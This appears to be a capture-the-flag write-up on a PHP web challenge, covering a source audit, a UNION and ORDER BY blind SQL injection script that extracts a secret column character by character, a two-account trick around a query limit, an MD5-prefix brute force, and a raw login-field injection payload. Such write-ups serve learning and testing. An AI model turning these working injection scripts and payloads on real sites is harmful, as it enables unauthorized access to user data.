Too much of a noob, missed out on 5k
First, a directory scan turned up register.php. After registering I landed on profile.php?id=xx; id=2 showed the hint thisissource.php, so I downloaded the source and audited it.
Login and registration filter single quotes and backslashes in the username:
```php
// registration/login check: reject short names, single quotes and backslashes
if(strlen($username) < 3 or preg_match("|'|",$username) or preg_match("|\\\\|",$username))
```
Then in profile.php I found that id only filters `.`, `(`, `)` and `_`, so a union query is possible: id=0 union select 1,2,3,4,5 shows that field 2 is displayed. I then went down a rabbit hole and spent a whole night trying to inject without getting anywhere.
Rereading the source later, I found:
```sql
CREATE TABLE `users` (
  `id` int(5) NOT NULL AUTO_INCREMENT,
  `user` varchar(20) DEFAULT NULL,
  `pass` varchar(32) DEFAULT NULL,
  `$secret` varchar(36) DEFAULT NULL,
  `count` int(3) DEFAULT NULL,
  PRIMARY KEY (`id`)
)
```
`$secret` is the 4th column. A senior then reminded me that ORDER BY injection would work, and I immediately remembered a trick from an earlier blog post: UNION in a row that carries a guess in column 4 and ORDER BY 4; which row comes out first tells you whether the guess sorts before or after the real value, so the secret can be recovered character by character.
There is a limit on the number of queries, though:
```php
if($row['count'] == 140)
{
    if(mysql_query("update users set $secret='{$duihuanma}' where user='$username';"))
    {
        mysql_query("update users set count=0 where user='$username';");
        die("<center><br><h3>Too many attempts, the redemption code has been reset</h3></center>");
    }
    return $duihuanma;
}
```
But the username here comes from the session, so you can register two accounts, a main one and a throwaway, and use the throwaway's session to run the queries against the main account's id. That way the throwaway's `$secret` gets reset over and over while the main account's stays untouched.
So, the script:
```python
import requests
import hashlib
import random

url = 'http://54.223.59.178/profile.php?id='
cookie = {'PHPSESSID': '03faiapvojtao8uhs323venhd4'}
# '{' sorts right after 'z', so it is the sentinel that detects a 'z' at the current position
charset = '0123456789abcdefghijklmnopqrstuvwxyz{'
ch = 'apohnw4bjlyr62qicd5f18zexkt9vu7gm3'   # prefix already recovered by an earlier run
for i in range(36):
    for k in range(37):
        # inject a row whose 4th column is the guess; ORDER BY 4 puts it before or after the real row
        payload = "29 union select 1,2,3,'" + ch + charset[k] + "',5 order by 4"
        resp = requests.get(url=url + payload, cookies=cookie)
        # 'hammer' is the main account's username: it shows up once the guess sorts past the
        # real secret, so the real character is the previous one in the charset
        if 'hammer' in resp.text:
            ch = ch + charset[k - 1]
            print(ch)
            break
    if len(ch) == 36:
        break
# brute-force a 4-character string whose md5 starts with ee3c
while True:
    s = ''.join(random.sample('qwertyuiopasdfghjklzxcvbnm1234567890', 4))
    if hashlib.md5(s.encode('utf_8')).hexdigest()[0:4] == 'ee3c':
        print(s)
        break
```
The script isn't very stable; when it goes off the rails, delete the last character and rerun.
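As an added example, not the author's script, here is the same ORDER BY oracle run against a local SQLite stand-in for profile.php, so the extraction logic can be checked offline. The mock's behaviour is assumed from the writeup: the id is concatenated into the SQL, the first row's user column is displayed, and every request bumps the counter of the session's user, regenerating that user's code at 140 and dying instead of rendering a profile. Two changes over the script above target the instability it mentions: `order by 4,1` breaks the tie that `order by 4` leaves undefined when the guess equals the whole secret (the injected row's id 1 then sorts first, which is the branch the algorithm wants), and a probe answered by the reset message is repeated rather than counted as a miss. Account names, ids, the reset message and the secrets are all constructed.

```python
import random
import sqlite3

# '{' (0x7b) sorts right after 'z', so it is the sentinel that closes a position
# whose real character is 'z'; the secret itself is assumed to use only [0-9a-z].
CHARSET = '0123456789abcdefghijklmnopqrstuvwxyz{'
SECRET_LEN = 36          # varchar(36) in the page's schema
RESET_AT = 140           # threshold of the count check quoted from the source
RESET_MSG = 'too many attempts, code reset'   # constructed stand-in for the die() text


class ProfileMock:
    """Constructed stand-in for profile.php (assumed behaviour, not the page's code):
    the id parameter is dropped into the SQL unparameterised, the first row's
    second column (user) is displayed, and each request bumps the counter of the
    user who owns the session, not of the row being queried."""

    def __init__(self, seed=7):
        self.rng = random.Random(seed)
        self.requests = 0
        self.db = sqlite3.connect(':memory:')
        self.db.execute('create table users (id integer primary key, user text, '
                        'pass text, secret text, "count" integer)')
        secret = self._new_secret()
        self.db.execute("insert into users values (29, 'hammer', 'x', ?, 0)", (secret,))
        self.db.execute("insert into users values (30, 'lowpriv', 'x', ?, 0)", (secret[::-1],))
        self.db.commit()

    def _new_secret(self):
        return ''.join(self.rng.choice(CHARSET[:-1]) for _ in range(SECRET_LEN))

    def secret_of(self, user):
        return self.db.execute('select secret from users where user = ?', (user,)).fetchone()[0]

    def view(self, session_user, id_param):
        self.requests += 1
        self.db.execute('update users set "count" = "count" + 1 where user = ?', (session_user,))
        count = self.db.execute('select "count" from users where user = ?',
                                (session_user,)).fetchone()[0]
        if count == RESET_AT:
            # the throttle resets the *session* user's code and dies without showing a profile
            self.db.execute('update users set secret = ?, "count" = 0 where user = ?',
                            (self._new_secret(), session_user))
            return RESET_MSG
        row = self.db.execute('select * from users where id = ' + id_param).fetchone()
        return str(row[1]) if row else ''


def extract_secret(mock, session_user, target_id, target_user):
    """Recover the target's secret one character at a time through the ORDER BY oracle.

    A guess g is injected as column 4 of a UNION row. With `order by 4,1` the
    target's row is listed first (its username shown) exactly when secret < g;
    when g is a prefix of the secret, or equal to it, the injected row (id 1)
    wins and nothing useful is shown. So the first guess that makes the username
    appear is one charset step past the real character."""
    found = ''
    while len(found) < SECRET_LEN:
        for k, c in enumerate(CHARSET):
            payload = f"{target_id} union select 1,2,3,'{found + c}',5 order by 4,1"
            shown = mock.view(session_user, payload)
            while shown == RESET_MSG:      # throttle fired on the throwaway account: repeat the probe
                shown = mock.view(session_user, payload)
            if shown == target_user:
                if k == 0:
                    raise RuntimeError('secret contains a character below the charset')
                found += CHARSET[k - 1]
                break
        else:
            raise RuntimeError('no guess sorted past the secret: charset incomplete?')
    return found


if __name__ == '__main__':
    mock = ProfileMock()
    before = mock.secret_of('hammer')
    got = extract_secret(mock, 'lowpriv', 29, 'hammer')
    print(got, got == before, mock.requests, 'requests')
```

Running it shows the main account's secret coming back intact after several hundred requests, while the throwaway's code has been regenerated several times along the way, which is exactly the two-account trick described above.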
Actually you can also inject through the password, which has no filtering at all:
```php
$sql = "select id,user from users where user = '$username' and pass = md5('$password')";
```
So the payload:

username=ashdasohdia&password=1') union select d,1 from (select 1 as a,2 as b,3 as c,4 as d,5 as f from users where id = 0 union select * from users where id = 29) as a%23

`%23` is `#`, which comments out the trailing `')`. The derived table selects the whole row of id 29 behind the aliases a..f, so `d` reads the 4th column without ever having to name `$secret`. The username has to be random garbage so that the real query matches nothing; the id in the 302 redirect then contains `$secret`.